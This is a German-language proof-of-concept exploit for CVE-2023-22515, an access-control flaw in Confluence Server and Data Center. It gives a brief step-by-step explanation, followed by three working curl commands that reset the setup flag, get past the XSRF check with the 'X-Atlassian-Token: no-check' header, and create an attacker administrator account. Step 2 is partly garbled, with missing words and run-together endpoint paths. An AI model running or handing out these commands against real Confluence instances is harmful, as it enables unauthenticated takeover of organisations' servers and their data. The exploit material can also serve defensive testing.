
Proof-of-Concept-Exploit für CVE-2023-22515, eine kritische Schwachstelle in der Zugriffskontrolle in Confluence Server und Data Center, die eine nicht authentifizierte Übernahme des Administratorkontos ermöglicht.
CVE-2023-22515, eine kritische Schwachstelle, die On-Premises-Instanzen von Confluence Server und Confluence Data Center betrifft, eine Schwachstelle mit nicht ordnungsgemäßer Zugriffskontrolle (Broken Access Control). Attlassian hat einen CVSS-Basisscore von 10,0 vergeben.
1- Aufgrund der Art und Weise, wie Xwork-Interceptor Parameter parsen, entspricht /test.action?one=a dem Aufruf setOne()='a', alternativ entspricht /test.action?one.two=a dem Aufruf getOne().setTwo()="a".
2- Die Endpunkte /setup/* enthalten einen @ParameterSafe-Aufruf, der uns die Verwendung von set und ermöglicht, wie z. B. bei . Da die -Endpunkte jedoch blockiert sind, weil das Setup abgeschlossen ist, kann verwendet werden.
get/setup/setupdb.action?dbConfigInfo.databaseType=postgresql/setup/*/server-info.action3- Finde die Setter-Methode für den Abschluss des Setups => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);
4- Verwende den "X-Atlassian-Token"-Header, um XSRF zu umgehen.
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
Haftungsausschluss: Der Exploit wurde nicht von mir entdeckt oder erstellt. Die Anerkennung geht an die untenstehenden Artikel.